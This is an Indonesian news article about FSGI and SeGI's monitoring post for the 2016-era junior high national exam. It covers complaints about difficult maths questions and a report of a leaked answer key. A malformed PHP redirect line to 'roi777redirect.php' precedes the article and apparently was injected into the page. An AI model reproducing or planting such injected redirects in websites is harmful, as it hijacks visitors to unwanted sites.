header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); Posko UN FSGI dan SeGI Temukan Kunci Jawaban Bahasa Inggris SMP di Lampung -
Posko UN FSGI dan SeGI Temukan Kunci Jawaban Bahasa Inggris SMP di Lampung

translampung.com – Sama seperti dipelaksanaan Tim Pemantau Posko FSGI UN tingkat SMA sederajat. Federasi Serikat Guru Indonesia (FSGI) kali ini bersama Serikat Guru Indonesia (SeGI) kembali membuka “Posko Pemantauan UN SMP” sejak minggu 8 Mei dan akan ditutup kamis, 12 Mei ini.

Sekjen FSGI Retno Listyari dalam rilisnya yang diterima Redaksi Translampung, Rabu (11/5)  membeberkan pada hari pertama UN SMP, FSGI hanya menerima laporan pengaduan sebanyak 6 (lima) laporan yang berasal dari Jakarta Utara, Jakarta Pusat , Jakarta Timur, Medan, Lampung dan Mataram. Laporan seputar UN berjalan lancar dan soal Bahasa Indonesia dianggap cukup mudah bagi para siswa.

Pada hari kedua, Posko FSGI menerima 6 laporan dari Jakarta, Bandung, Garut, Lampung dan Bima yang mengeluhkan sulitnya soal UN matematika. Pelapor yang merupakan orangtua siswa mengeluhkan bahwa soal-soal matematika yang sulit adalah soal yang tidak ada dalam kisi-kisi soal dan tidak pernah diajarkan/dipelajari para siswa.

“Ada orangtua mengisahkan anaknya peserta UNBK matematika yang giliran ujian pada jam 13 wib, namun si anak sudah stres sebelum masuk ruang ujian karena menyaksikan teman-temannya menangis saat keluar ruangan ujian (labotarium computer), karena kesulitan menjawab soal-soal UN Matematika, mereka khawatir nilainya rendah karena banyak soal tidak mampu di jawab,” urainya.

Ikut menambahkan, Ketua SeGI Heru Purnomo untuk hari ketiga, Posko FSGI juga bersama SEGI menerima laporan dari seorang guru pengawas di Jakarta yang mendapatkan kunci jawaban dari peserta UN yang diawasinya.

Pages: 1 2
News Reporter

Tinggalkan Balasan

Alamat email Anda tidak akan dipublikasikan.